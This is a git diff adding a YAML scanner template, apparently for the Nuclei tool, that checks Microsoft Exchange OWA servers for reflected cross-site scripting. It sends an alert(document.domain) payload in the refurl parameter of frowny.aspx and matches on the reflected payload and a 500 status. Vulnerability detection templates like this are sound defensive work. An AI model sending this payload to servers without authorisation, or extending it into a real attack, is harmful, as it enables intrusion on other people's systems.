diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
new file mode 100644
index 0000000000..8b978d6484
--- /dev/null
+++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
@@ -0,0 +1,28 @@
+id: ms-exchange-server-reflected-xss
+
+info:
+  name: MS Exchange Server XSS (
+  author: infosecsanyam
+  severity: high
+  description: |
+    Microsoft Exchange Server XSS.
+  reference: |
+        - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
+  tags: exchangeserver,owa,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'alert(document.domain)//'
+        condition: or
+
+      - type: status
+        status:
+          - 500
+